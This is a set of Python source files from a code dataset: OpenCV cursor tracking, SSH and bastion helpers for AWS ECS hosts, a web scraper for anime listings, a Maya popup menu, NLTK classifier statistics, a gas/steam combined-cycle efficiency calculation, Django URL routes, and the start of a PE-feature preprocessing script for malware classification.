_ = cv2.findContours( mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n# blurmask = cv2.GaussianBlur( mask, (5,5), 0)\n# _, contourb, _ = cv2.findContours( blurmask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n area = np.zeros([len(contour)])\n\n for i in range(len(contour)):\n area[i] = cv2.contourArea(contour[i])\n\n a = sorted(area,reverse=True)\n \n for i in range(len(contour)):\n for j in range(1):\n if area[i] == a[j]:\n swap(contour, i, j)\n ''' \n area = np.zeros([len(contourb)])\n\n for i in range(len(contourb)):\n area[i] = cv2.contourArea(contourb[i])\n\n a = sorted(area,reverse=True)\n \n for i in range(len(contourb)):\n for j in range(1):\n if area[i] == a[j]:\n swap(contourb, i, j)\n '''\n if len(contour)>0:\n rect = cv2.minAreaRect(contour[0])\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n c = rect[0]\n pre_center = center\n center = np.array([int(c[0]),int(c[1])])\n# print center\n cv2.circle(frame, (int(c[0]),int(c[1])), 3, (0,255,255), -1)\n ellipse = cv2.fitEllipse(contour[0])\n cv2.ellipse(frame,ellipse,(0,0,255),2)\n if(abs(pre_center[0]-center[0])>3 and abs(pre_center[1]-center[1])>3):\n pyautogui.moveTo(3*center[0],3*center[1],)\n\n\n# vidContb = cv2.drawContours( frame, contourb[0:2], -1, (0,255,0), 2)\n vidCont = cv2.drawContours( frame, [box], 0, (0,255,0), 2)\n # Bitwise-AND mask and original imaget\n res = cv2.bitwise_and(frame ,frame, mask= mask)\n\n\n# cv2.imshow('contb', vidContb)\n cv2.imshow('cont', vidCont)\n# cv2.imshow('res',res)\n\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()","sub_path":"curtrack1.py","file_name":"curtrack1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"140208474","text":"import os\nimport random\nimport string\nimport subprocess\nfrom tempfile import NamedTemporaryFile\n\n\nclass SSMProvider():\n\n def __init__(self, service):\n self.service = service\n self.host_instance = self.service.host_instance\n\n def ok_to_run(self):\n if self.service.host_instance:\n return True\n return False\n\n def 
get_ssh_command(self, verbose_flag, instance=None): \n if instance:\n host_instance = instance.id\n else:\n host_instance = self.host_instance\n cmd = 'ssh -t {} ec2-user@{}'.format(verbose_flag, host_instance)\n return cmd\n\n def get_docker_exec_sub_command(self):\n cmd = '\\'/usr/bin/docker exec -it `/usr/bin/docker ps --filter \"name=ecs-{}*\" -q` bash \\''\n return cmd\n\n def get_tunnel_command(self, host, local_port, host_port, ecs_host):\n cmd = 'ssh -N -L {}:{}:{} {}'.format(local_port, host, host_port, ecs_host)\n return cmd\n\n def push_command(self, name, run=False):\n if run:\n return '\"cat > {};bash {};rm {}\"'.format(name, name, name)\n return '\"cat > {}\"'.format(name)\n\n\nclass BastionProvider():\n\n def __init__(self, service):\n self.service = service\n\n def ok_to_run(self):\n if self.service.host_ip and self.service.bastion:\n return True\n return False\n\n def get_ssh_command(self, verbose_flag, instance=None):\n if instance:\n ssh_host_ip = instance.ip\n else:\n ssh_host_ip = self.service.host_ip\n cmd = 'ssh {} -o StrictHostKeyChecking=no -A -t ec2-user@{} ssh {} -o StrictHostKeyChecking=no -A -t {}'.format(verbose_flag, self.service.bastion, verbose_flag, ssh_host_ip)\n return cmd\n\n def get_docker_exec_sub_command(self):\n cmd = \"\\\"/usr/bin/docker exec -it '\\$(/usr/bin/docker ps --filter \\\"name=ecs-{}*\\\" -q)' bash\\\"\"\n return cmd\n\n def get_tunnel_command(self, host, local_port, host_port, ecs_host):\n interim_port = random.randrange(10000, 64000, 1)\n host_ip, bastion = self.service._get_host_bastion(ecs_host)\n cmd = 'ssh -L {}:localhost:{} ec2-user@{} ssh -L {}:{}:{} {}'.format(local_port, interim_port, bastion, interim_port, host, host_port, host_ip)\n return cmd\n\n def push_command(self, name, run=False):\n if run:\n return '\"cat \\> {}\\;bash {}\\;rm {}\"'.format(name, name, name)\n return '\"cat \\> {}\"'.format(name)\n\n\nclass SSH():\n\n def __init__(self, service, ssm=False):\n self.service = service\n self.service._search_hosts()\n\n if ssm:\n self.provider = SSMProvider(service)\n else:\n self.provider = BastionProvider(service)\n\n def __is_or_has_file(self, data):\n '''\n Figure out if we have been given a file-like object as one of the inputs to the function that called this.\n Is a bit clunky because 'file' doesn't exist as a bare-word type check in Python 3 and built in file objects\n are not instances of io. in Python 2\n\n https://stackoverflow.com/questions/1661262/check-if-object-is-file-like-in-python\n Returns:\n Boolean - True if we have a file-like object\n '''\n if (hasattr(data, 'file')):\n data = data.file\n\n try:\n return isinstance(data, file)\n except NameError:\n from io import IOBase\n return isinstance(data, IOBase)\n\n def push_remote_text_file(self, input_data=None, run=False, file_output=False, instance=None):\n \"\"\"\n Push a text file to the current remote ECS cluster instance and optionally run it.\n\n :param input_data: Input data to send. 
Either string or file.\n :param run: Boolean that indicates if the text file should be run.\n :param file_output: Boolean that indicates if the output should be saved.\n :return: tuple - success, output\n \"\"\"\n if self.__is_or_has_file(input_data):\n path, name = os.path.split(input_data.name)\n else:\n name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))\n\n cmd = self.provider.push_command(name, run)\n\n with_output = True\n if file_output:\n with_output = NamedTemporaryFile(delete=False)\n output_filename = with_output.name\n\n success, output = self.ssh(command=cmd, with_output=with_output, input_data=input_data, instance=instance)\n if file_output:\n output = output_filename\n return success, output\n\n def run_remote_script(self, lines, file_output=False, instance=None):\n \"\"\"\n Run a script on the current remote ECS cluster instance.\n\n :param lines: list of lines of the script.\n :param file_output: Boolean that indicates if the output should be saved.\n :return: tuple - success, output\n \"\"\"\n data = '\\n'.join(lines)\n return self.push_remote_text_file(input_data=data, run=True, file_output=file_output, instance=instance)\n\n def _run_command_with_io(self, cmd, output_file=None, input_data=None):\n success = True\n\n if output_file:\n stdout = output_file\n else:\n stdout = subprocess.PIPE\n\n if input_data:\n if self.__is_or_has_file(input_data):\n stdin = input_data\n input_string = None\n else:\n stdin = subprocess.PIPE\n input_string = input_data\n else:\n stdin = None\n\n try:\n p = subprocess.Popen(cmd, stdout=stdout, stdin=stdin, shell=True, universal_newlines=True)\n output, errors = p.communicate(input_string)\n except subprocess.CalledProcessError as err:\n success = False\n output = \"{}\\n{}\".format(err.cmd, err.output)\n output = err.output\n\n return success, output\n\n def cluster_run(self, cmd):\n \"\"\"\n Run a command on each of the ECS cluster machines.\n\n :param cmd: Linux command to run.\n\n :return: list of tuples\n \"\"\"\n instances = self.service.get_instances()\n responses = []\n for instance in instances:\n success, output = self.run_remote_script(cmd, instance=instance)\n responses.append((success, output))\n return responses\n\n\n def ssh(self, command=None, is_running=False, with_output=False, input_data=None, verbose=False, instance=None):\n \"\"\"\n :param is_running: only complete the ssh if a task from our service is\n actually running in the cluster\n :type is_running: boolean\n \"\"\"\n\n if is_running and not self.service.is_running:\n return\n\n if self.provider.ok_to_run():\n if verbose:\n verbose_flag = \"-vv\"\n else:\n verbose_flag = \"-q\"\n cmd = self.provider.get_ssh_command(verbose_flag, instance)\n if command:\n cmd = \"{} {}\".format(cmd, command)\n\n if with_output:\n if self.__is_or_has_file(with_output):\n output_file = with_output\n else:\n output_file = None\n return self._run_command_with_io(cmd, output_file=output_file, input_data=input_data)\n\n subprocess.call(cmd, shell=True)\n\n def docker_exec(self, verbose=False):\n \"\"\"\n Exec into a running Docker container.\n \"\"\"\n # command = '\\'/usr/bin/docker exec -it `/usr/bin/docker ps --filter \"name=ecs-{}*\" -q` bash \\''\n command = self.provider.get_docker_exec_sub_command()\n command = command.format(self.service.family)\n self.ssh(command, is_running=True, verbose=verbose)\n\n def tunnel(self, host, local_port, host_port):\n \"\"\"\n Open tunnel to remote system.\n :param host:\n :param local_port:\n :param 
host_port:\n :return:\n \"\"\"\n hosts = self.service._get_cluster_hosts()\n ecs_host = hosts[list(hosts.keys())[0]]\n cmd = self.provider.get_tunnel_command(host, local_port, host_port, ecs_host)\n subprocess.call(cmd, shell=True)\n\n\nclass SSHConfig():\n\n def __init__(self, service, config):\n self.service = service\n self.proxy = 'bastion'\n ssh_yml = config.get_global_config('ssh')\n if ssh_yml:\n if 'proxy' in ssh_yml:\n self.proxy = ssh_yml['proxy']\n if 'ssh' in service.yml:\n if 'proxy' in service.yml['ssh']:\n self.proxy = service.yml['ssh']['proxy']\n\n def get_ssh(self):\n ssh = SSH(self.service, self.proxy=='ssm')\n return ssh\n","sub_path":"deployfish/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":8752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"590004601","text":"#curl http://gigazine.net/news/20160604-anime-2016summer/ > htmls/2016summer.html\n\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nfrom pprint import pprint\nimport csv\nimport time\n\ncours_id = 15\nid_start = 570\n\nargvs = sys.argv\n\ninput_file = argvs[1]\n\nhtml = open(input_file)\n\nbsObj = BeautifulSoup(html.read(), \"html.parser\")\n\nanime_list = bsObj.find_all(\"hr\")\n\n#pprint(anime_list)\n\nbases = []\n\nfmt = '%Y-%m-%d %H:%M:%S'\nnow = time.strftime(fmt, time.localtime())\n\nfor anime in anime_list:\n\n try:\n base = {}\n\n base['public_url'] = anime.find(\"a\").get(\"href\")\n\n base['title'] = anime.find(\"a\").get_text()\n\n print (base['title'])\n #twitter_account = anime.find_next(\"a\", {\"href\" : re.compile(\".+twitter.+\")})\n twitter_account = anime.find_next(string=re.compile(\"ハッシュタグ\")).find_previous(\"a\")\n\n pprint(twitter_account)\n\n twitter_account_save = \"\"\n hash_tag_save = \"\"\n\n check_index = twitter_account.find_previous(\"hr\").find(\"a\").get_text()\n\n if base['title'] == check_index:\n twitter_account_text = twitter_account.get(\"href\")\n twitter_account_save = re.sub('https://twitter.com/', '', twitter_account_text)\n else:\n twitter_account = anime.find_next(string=re.compile(\"Twitter:\")).find_next(\"a\")\n check_index = twitter_account.find_previous(\"hr\").find(\"a\").get_text()\n if base['title'] == check_index:\n twitter_account_text = twitter_account.get(\"href\")\n twitter_account_save = re.sub('https://twitter.com/', '', twitter_account_text)\n\n\n check_index = twitter_account.find_next(string=re.compile(\"ハッシュタグ\")).find_previous(\"hr\").find(\"a\").get_text()\n\n if base['title'] == check_index:\n hash_tag = twitter_account.find_next(string=re.compile(\"ハッシュタグ\"))\n hash_tag_save = re.sub('\\nハッシュタグ:#', '', hash_tag)\n\n base['id'] = id_start\n id_start += 1\n base['cours_id'] = cours_id\n base['sequel'] = 0\n base['sex'] = 0\n base['created_at'] = now\n base['updated_at'] = now\n\n base['twitter_account'] = twitter_account_save\n base['twitter_hash_tag'] = hash_tag_save\n\n bases.append(base)\n\n except Exception as e:\n print (e)\n\n#pprint(bases)\n\n\nwith open(input_file + \".csv\", 'wt') as fout:\n cout = csv.DictWriter(fout, ['id', 'title', 'public_url', 'twitter_account','twitter_hash_tag','facebook','cours_id','created_at','updated_at','sex','sequel'])\n cout.writeheader()\n cout.writerows(bases)\n\n\n\n\n","sub_path":"gigazine_anime_2017_summer.py","file_name":"gigazine_anime_2017_summer.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418688652","text":"# 
coding:utf-8\r\n'''\r\nCreated on 2016. 11. 20.\r\n\r\n@author: kyuho_choi\r\n'''\r\n\r\nimport pymel.core as pm\r\n\r\n\r\nATTRNAME = 'luffyRigType'\r\nPOPUPNAME = 'Luffy_popupUI'\r\ndef createBodyMenu(node, name):\r\n    pm.setParent(POPUPNAME, m=True)\r\n    pm.menuItem(boldFont=True, l=name )\r\n    pm.menuItem(d=True)\r\n    pm.menuItem(l='import', c=pm.Callback(core.importDefaultHuman) )\r\n    pm.menuItem(l='Reset Joints', c=pm.Callback(core.reset) )\r\n    pm.menuItem(d=True)\r\n    pm.menuItem(l='Set Default Rotation', c=pm.Callback(core.setDefaultRotation) )\r\n    pm.menuItem(d=True)\r\n    pm.menuItem(l='Set Mirror Pose', c=pm.Callback(core.mirrorPose) )\r\n    pm.menuItem(l='Set Break Mirror', c=pm.Callback(core.breakMirror) )\r\n    \r\n\r\n\r\n\r\n#===============================================================================\r\n#\r\n# DoNotTouch\r\n#\r\n#===============================================================================\r\ndef overrideDagMenuProc():\r\n    ''' Delete the popup menu and return the name of the geometry under the mouse; the name is extracted from the menu command '''\r\n    # The mouse clicked a dagObject, ....???\r\n    pm.dagObjectHit(menu=POPUPNAME)\r\n    \r\n    # Get the list of child menu items.\r\n    popChildren = pm.popupMenu(POPUPNAME, query=True, itemArray=True)\r\n    # print \"popChildren:\",popChildren\r\n    # Result : popChildren: [u'menuItem3927', u'menuItem3928', u'menuItem3929', u'menuItem3930', u'menuItem3931', u'menuItem3932', u'menuItem3933', u'menuItem3934', u'menuItem3937', u'menuItem3938', u'menuItem3939', u'menuItem3940', u'menuItem3941', u'menuItem3942', u'menuItem3943', u'menuItem3944', u'menuItem3945', u'menuItem3946', u'menuItem3947', u'menuItem3948', u'menuItem3949', u'menuItem3950', u'menuItem3951', u'menuItem3952', u'menuItem3953', u'menuItem3954', u'menuItem3955', u'menuItem3956', u'menuItem3957', u'menuItem3958', u'menuItem3959', u'menuItem3960', u'menuItem3961', u'menuItem3962', u'menuItem3963', u'menuItem3964', u'menuItem3965', u'menuItem3966', u'menuItem3967', u'menuItem3968', u'menuItem3969', u'menuItem3970', u'menuItem3971', u'menuItem3972']\r\n    \r\n    # Get the command of the 0th menu item.\r\n    \r\n    command = pm.menuItem(popChildren[0], query=True, command=True)\r\n    # print \"command:\",command\r\n    # Result : command: showEditor geo\r\n    \r\n    # Get the last word of the command.\r\n    # fullName: geo\r\n    fullName = command.split(' ')[-1]\r\n    # print \"fullName:\",fullName\r\n    # Result : fullName: geo\r\n    \r\n    # Important: delete the popup menu\r\n    pm.popupMenu(POPUPNAME, edit=True, deleteAllItems=True)\r\n    \r\n    # Return the geometry name\r\n    return fullName\r\n\r\ndef postMenuCommand(*args):\r\n    # If the popup menu already exists, delete all its items\r\n    if pm.popupMenu(POPUPNAME, exists=True):\r\n        pm.popupMenu(POPUPNAME, edit=True, deleteAllItems=True)\r\n\r\n    # Make our menu the current menu for any new children:\r\n    # Child setup for the menu that is about to be newly created\r\n    pm.setParent(POPUPNAME, menu=True)\r\n    \r\n    # If the mouse clicked a dagObject\r\n    if pm.dagObjectHit():\r\n        \r\n        # Delete the popup menu and get back the geometry name.\r\n        fullObjectName = overrideDagMenuProc()\r\n        \r\n        # Cast to a PyNode\r\n        node = pm.PyNode(fullObjectName)\r\n        \r\n        # Extract the object name with the namespace stripped\r\n        nodeName = node.name()\r\n        withoutNamespace = nodeName.rpartition(':')[2]\r\n        #print withoutNamespace\r\n        \r\n        # If it has the attribute name we specified\r\n        if node.hasAttr(ATTRNAME):\r\n            createBodyMenu(node, withoutNamespace)\r\n        \r\n    else:\r\n        pm.menuItem(label='No object under cursor')\r\n\r\ndef popupMenu():\r\n    ''' popupMenu entry point '''\r\n    # If the popup menu already exists, delete it\r\n    if pm.popupMenu(POPUPNAME, exists=True):\r\n        pm.deleteUI(POPUPNAME)\r\n\r\n    # Create the popup on shift + alt + RMB\r\n    pm.popupMenu(POPUPNAME,\r\n                 button=3,\r\n                 shiftModifier=True,\r\n                 altModifier=True,\r\n                 
markingMenu=True,\r\n                 parent='viewPanes',\r\n                 postMenuCommand=postMenuCommand)","sub_path":"luffy/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"436317756","text":"import numpy as np\nimport random\nfrom matplotlib import pyplot as plt\nimport nltk\nimport pandas as pd\nfrom Statistic import make_csv\n\n\n# Display the chart\ndef show_classifiers_stat(classifier_list, number_of_iterations, set, train_set_size):\n    # Adding labels for charts\n    def P_autolabel(rects):\n        # attach some text labels\n        global ax\n        for rect in rects:\n            height = rect.get_height()\n            ax.text(rect.get_x() + rect.get_width() / 4., 1.05 * height,\n                    '%10.2f' % height,\n                    ha='center', va='bottom')\n\n    # Creates a dictionary\n    def get_info(classifier, accuracy):\n        array = np.array(accuracy)\n        classifier.low = array.min()\n        classifier.high = array.max()\n        classifier.mean = array.mean()\n        classifier.get_diff()\n        info[classifier.title] = classifier\n\n    info = {}\n    # Grabbing statistics from all classifiers\n    for classifier in classifier_list:\n        accuracy = []\n        clean_classifier = classifier\n        for i in range(number_of_iterations):\n            random.shuffle(set)\n            training_set = set[:train_set_size]\n            testing_set = set[train_set_size:]\n            classifier.classifier.train(training_set)\n            accuracy.append(nltk.classify.accuracy(classifier.classifier, testing_set))\n            classifier = clean_classifier\n        get_info(classifier, accuracy)\n\n    # Drawing\n    label = []\n    lowl = [x.low for x in info.values()]\n    highl = [x.high for x in info.values()]\n    meanl = [x.mean for x in info.values()]\n    diffl = [x.difference for x in info.values()]\n    for i in classifier_list:\n        label.append(i.title)\n    df = pd.DataFrame({\n        'Low': lowl,\n        'High': highl,\n        'Mean': meanl,\n        'Difference': diffl\n    }, index = label)\n    make_csv(info)\n    df.plot(kind='bar', title='Accuracy', use_index=True, colormap = 'viridis')\n    plt.show()\n","sub_path":"Visual.py","file_name":"Visual.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"55981669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 31 22:01:28 2018\n\n@author: Alex Snouffer\n\"\"\"\n\nimport sympy\nimport cantera\nfrom matplotlib import pyplot\nimport numpy\n\ndef h_OutCompressor(n_c, hOI, hI):\n    \"\"\"\n    \"\"\"\n    (n_comp, hOutIsentropic, hIn, \n     hOutActual) = sympy.symbols('n_comp hOutIsentropic hIn hOutActual')\n    \n    eEff = sympy.Eq(n_comp, (hOutIsentropic - hIn)/(hOutActual - hIn))\n    e_h_Out = sympy.solve(eEff, hOutActual)\n    h_Out = e_h_Out[0].evalf(subs = {n_comp: n_c, hOutIsentropic: hOI, \n                                     hIn: hI})\n    return h_Out\n\ndef h_OutTurbine(n_t, hOI, hI):\n    \"\"\"\n    \"\"\"\n    (n_turbine, hOutIsentropic, hIn, \n     hOutActual) = sympy.symbols('n_turbine hOutIsentropic hIn hOutActual')\n    \n    eEff = sympy.Eq(n_turbine, (hIn - hOutActual)/(hIn - hOutIsentropic))\n    e_h_Out = sympy.solve(eEff, hOutActual)\n    h_Out = e_h_Out[0].evalf(subs = {n_turbine: n_t, hOutIsentropic: hOI, \n                                     hIn: hI})\n    return h_Out\n\ndef atm2Pa(P):\n    P = P * 101325\n    return P\n\ndef rev_irrev(hin, hout, sin, sout, Tin, Qin, Qout, mdotratio):\n    To = 300\n    irrev = mdotratio * (Qout + To * (sout - sin))\n    rev = mdotratio * ((hin - hout) - To * (sin - sout) + Qin * (1 - (To/Tin)))\n    rev_irrev_ans = [rev, irrev]\n    return rev_irrev_ans\n    \n# Brayton Cycle Parameters\nn_comp_Brayton = 0.8\nn_turbine_Brayton = 0.85\nn_heatExchanger = 
0.86\nn_pump_Rankine = 0.9\nn_turbine_Rankine = 0.9\n\nW_NET = []\nmassRatio = []\nQ_In = []\nQ_Out = []\nn_thermal = []\n\np5 = []\np6 = []\np7 = []\np8 = []\np9 = []\np1 = []\np2 = []\np3 = []\np4 = []\n\nt5 = []\nt6 = []\nt7 = []\nt8 = []\nt9 = []\nt1 = []\nt2 = []\nt3 = []\nt4 = []\n\ns5 = []\ns6 = []\ns7 = []\ns8 = []\ns9 = []\ns1 = []\ns2 = []\ns3 = []\ns4 = []\n\nh5 = []\nh6 = []\nh7 = []\nh8 = []\nh9 = []\nh1 = []\nh2 = []\nh3 = []\nh4 = []\n\nx3 = []\n\nWrev12 = []\nWrev23 = []\nWrev34 = []\nWrev41 = []\nWrev56 = []\nWrev67 = []\nWrev78 = []\nWrev89 = []\n\nW12a = []\nW23a = []\nW34a = []\nW41a = []\nW56a = []\nW67a = []\nW78a = []\nW89a = []\n\nri12 = []\nri23 = []\nri34 = []\nri41 = []\nri56 = []\nri67 = []\nri78 = []\nri89 = []\n\nfor pr in range(30, 201, 1):\n #Initial State of Brayton\n air5 = cantera.Solution('air.cti')\n p5.append(atm2Pa(1))\n t5.append(300)\n air5.TP = t5[-1], p5[-1]\n \n s5.append(air5.entropy_mass)\n h5.append(air5.enthalpy_mass)\n \n #State after Compressor\n air6 = cantera.Solution('air.cti')\n p6.append(atm2Pa(pr/10))\n air6.SP = s5[-1], p6[-1]\n t6.append(air6.T)\n \n h6_IS = air6.enthalpy_mass\n h6.append(h_OutCompressor(n_comp_Brayton, h6_IS, h5[-1]))\n air6.HP = h6[-1], p6[-1]\n s6.append(air6.entropy_mass)\n \n #State before Turbine (After Combustion)\n air7 = cantera.Solution('air.cti')\n p7.append(p6[-1])\n t7.append(1400)\n air7.TP = t7[-1], p7[-1]\n s7.append(air7.entropy_mass)\n\n h7.append(air7.enthalpy_mass)\n \n #State after Turbine\n air8 = cantera.Solution('air.cti')\n p8.append(p5[-1])\n air8.SP = s7[-1], p8[-1]\n h8_IS = air8.enthalpy_mass\n h8.append(h_OutTurbine(n_turbine_Brayton, h8_IS, h7[-1]))\n air8.HP = h8[-1], p8[-1]\n t8.append(air8.T)\n s8.append(air8.entropy_mass)\n \n #State After HRSG\n air9 = cantera.Solution('air.cti')\n p9.append(atm2Pa(1))\n t9.append(450)\n air9.TP = t9[-1], p9[-1]\n h9.append(air9.enthalpy_mass)\n s9.append(air9.entropy_mass)\n \n #State after the Condensor\n water1 = cantera.Water()\n p1.append(5 * 10**3)\n water1.PX = p1[-1], 0.0\n \n h1.append(water1.enthalpy_mass)\n s1.append(water1.entropy_mass)\n t1.append(water1.T)\n \n #State after Pump\n water2 = cantera.Water()\n p2.append(7 * 10**6)\n water2.SP = s1[-1], p2[-1]\n h2_IS = water2.enthalpy_mass\n h2.append(h_OutCompressor(n_pump_Rankine, h2_IS, h1[-1]))\n water2.HP = h2[-1], p2[-1]\n t2.append(water2.T)\n s2.append(water2.entropy_mass)\n \n #State after HRSG\n water3Perf = cantera.Water()\n p3.append(p2[-1])\n water3Perf.TP = t8[-1], p3[-1]\n h3perfect = water3Perf.enthalpy_mass\n h3.append(n_heatExchanger * (h3perfect - h2[-1]) + h2[-1])\n water3 = cantera.Water()\n water3.HP = h3[-1], p3[-1]\n \n s3.append(water3.entropy_mass)\n t3.append(water3.T)\n x3.append(water3.X)\n \n #State After Turbine Rankine\n water4 = cantera.Water()\n p4.append(p1[-1])\n water4.SP = s3[-1], p4[-1]\n h4_IS = water4.enthalpy_mass\n h4.append(h_OutTurbine(n_turbine_Rankine, h4_IS, h3[-1]))\n water4.HP = h4[-1], p4[-1]\n t4.append(water4.T)\n s4.append(water4.entropy_mass)\n \n W_BraytonComp = h5[-1] - h6[-1]\n W_BraytonTurbine = h7[-1] - h8[-1]\n \n massRatio.append((h8[-1] - h9[-1]) / (h3[-1] - h2[-1]))\n \n W_RankinePump = massRatio[-1] * (h1[-1] - h2[-1])\n W_RankineTurbine = massRatio[-1] * (h3[-1] - h4[-1])\n \n W_Top = W_BraytonTurbine + W_BraytonComp \n W_Bottom = W_RankineTurbine + W_RankinePump\n W_NET.append(W_Top + W_Bottom)\n \n Q_In.append(h7[-1] - h6[-1])\n Q_Out.append(h4[-1] - h1[-1])\n \n n_thermal.append(W_NET[-1]/Q_In[-1])\n \n 
ri12.append(rev_irrev(h1[-1], h2[-1], s1[-1], s2[-1], t1[-1], 0, 0, massRatio[-1]))\n    ri23.append(rev_irrev(h2[-1], h3[-1], s2[-1], s3[-1], t2[-1], (h3[-1] - h2[-1]), 0, massRatio[-1]))\n    ri34.append(rev_irrev(h3[-1], h4[-1], s3[-1], s4[-1], t3[-1], 0, 0, massRatio[-1]))\n    ri41.append(rev_irrev(h4[-1], h1[-1], s4[-1], s1[-1], t4[-1], 0, -Q_Out[-1], massRatio[-1]))\n    \n    ri56.append(rev_irrev(h5[-1], h6[-1], s5[-1], s6[-1], t5[-1], 0, 0, 1))\n    ri67.append(rev_irrev(h6[-1], h7[-1], s6[-1], s7[-1], t6[-1], Q_In[-1], 0, 1))\n    ri78.append(rev_irrev(h7[-1], h8[-1], s7[-1], s8[-1], t7[-1], 0, 0, 1))\n    ri89.append(rev_irrev(h8[-1], h9[-1], s8[-1], s9[-1], t8[-1], 0, (h8[-1] - h9[-1]), 1))\n    \n    \npr = numpy.linspace(3.0, 20.0, 171)\npyplot.plot(pr, n_thermal)\nbestPR = n_thermal.index(max(n_thermal))\nprint('The max efficiency is: ', max(n_thermal))\nprint('The most efficient Pressure Ratio is: ', (bestPR + 30)/10.0)\n\n\n","sub_path":"Project2NewCode.py","file_name":"Project2NewCode.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"550653064","text":"from django.urls import path\nfrom . import views\nfrom .views import *\nfrom .webhooks import webhook\n\n\napp_name = 'profiles'\n\nurlpatterns = [\n    path('coach_create///', views.coach_create, name='coach_create'),\n    path('coach_list/', CoachList.as_view(), name='coach_list'),\n    path('coachee_create/', CoacheeCreate.as_view(), name='coachee_create'),\n    path('coachee_list/', CoacheeList.as_view(), name='coachee_list'),\n    path('coachee_edit/<int:pk>/', CoacheeEdit.as_view(), name='coachee_edit'),\n    path('coachee_delete/<int:pk>/', CoacheeDelete.as_view(), name='coachee_delete'),\n    path('cache_data/', views.cache_data, name='cache_data'),\n    path('wh/', webhook, name='webhook'),\n]\n","sub_path":"profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"574696641","text":"import operator\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\ndef getXY(path):\n    # getting unimp features\n    unimp_features = {\n        'AddressOfEntryPoint': 0,\n        'BaseOfCode': 0,\n        'BaseOfData': 0,\n        'Characteristics': 1032.206797186472,\n        'CheckSum': 0,\n        'DllCharacteristics': 1478.4954869782816,\n        'ExportNb': 0,\n        'FileAlignment': 0,\n        # 'ImageBase': 530.5361006533311,\n        'ImageBase': 0,\n        'ImportsNb': 0,\n        'ImportsNbDLL': 0,\n        'ImportsNbOrdinal': 0,\n        'LoadConfigurationSize': 0,\n        'LoaderFlags': 0,\n        'Machine': 1082.9256010888016,\n        'MajorImageVersion': 0,\n        'MajorLinkerVersion': 0,\n        'MajorOperatingSystemVersion': 236.61647685302975,\n        'MajorSubsystemVersion': 487.3898733331374,\n        'MinorImageVersion': 0,\n        'MinorLinkerVersion': 0,\n        'MinorOperatingSystemVersion': 0,\n        'MinorSubsystemVersion': 0,\n        'Name': 0,\n        'NumberOfRvaAndSizes': 0,\n        'ResourcesMaxEntropy': 441.8248905853912,\n        'ResourcesMaxSize': 0,\n        'ResourcesMeanEntropy': 0,\n        'ResourcesMeanSize': 0,\n        'ResourcesMinEntropy': 353.224684768646,\n        'ResourcesMinSize': 8.160597671881105,\n        'ResourcesNb': 0,\n        'SectionAlignment': 0,\n        'SectionMaxRawsize': 0,\n        'SectionMaxVirtualsize': 0,\n        'SectionsMaxEntropy': 580.740479410044,\n        'SectionsMeanEntropy': 72.19620856510386,\n        'SectionsMeanRawsize': 0,\n        'SectionsMeanVirtualsize': 0,\n        'SectionsMinEntropy': 158.0840575679675,\n        'SectionsMinRawsize': 0,\n        'SectionsMinVirtualsize': 0,\n        'SectionsNb': 
7.795926354766131,\n 'SizeOfCode': 0,\n 'SizeOfHeaders': 0,\n 'SizeOfHeapCommit': 0,\n 'SizeOfHeapReserve': 0,\n 'SizeOfImage': 0,\n 'SizeOfInitializedData': 0,\n 'SizeOfOptionalHeader': 393.1119115064255,\n 'SizeOfStackCommit': 0,\n 'SizeOfStackReserve': 93.14759692294628,\n 'SizeOfUninitializedData': 0,\n 'Subsystem': 590.0487097835594,\n 'VersionInformationSize': 648.0362688739431,\n 'md5': 0}\n unimp_features = sorted(unimp_features.items(), key=operator.itemgetter(1))\n unimp_features.reverse()\n unimp_features = unimp_features[16:]\n for i in range(len(unimp_features)):\n unimp_features[i] = unimp_features[i][0]\n \n # reading data\n dataset = pd.read_csv(path)\n dataset = dataset[dataset.columns.difference(unimp_features)]\n X = dataset.iloc[:,:-1].values\n y = dataset.iloc[:,-1].values\n \n # one-hot encoding (Categorical Data)\n from sklearn.preprocessing import LabelEncoder, OneHotEncoder\n labelencoder_X = LabelEncoder()\n \n # Label encoding\n X[:, 0] = labelencoder_X.fit_transform(X[:, 0])\n X[:, 1] = labelencoder_X.fit_transform(X[:, 1])\n X[:, 2] = labelencoder_X.fit_transform(X[:, 2])\n X[:, 3] = labelencoder_X.fit_transform(X[:, 3])\n X[:, 4] = labelencoder_X.fit_transform(X[:, 4])\n X[:, 14] = labelencoder_X.fit_transform(X[:, 14])\n \n for i in range(len(X[:, 14])):\n X[i, 14], X[i, 5] = X[i, 5], X[i, 14]\n \n onehotencoder = OneHotEncoder()\n Z = onehotencoder.fit_transform(X[:, :1]).toarray()\n Z = Z[:, 1:]\n X = X[:, 1:]\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = onehotencoder.fit_transform(X[:, :1]).toarray()\n W = W[:, 1:]\n X = X[:, 1:]\n Z = np.concatenate((Z, W), 1)\n \n W = 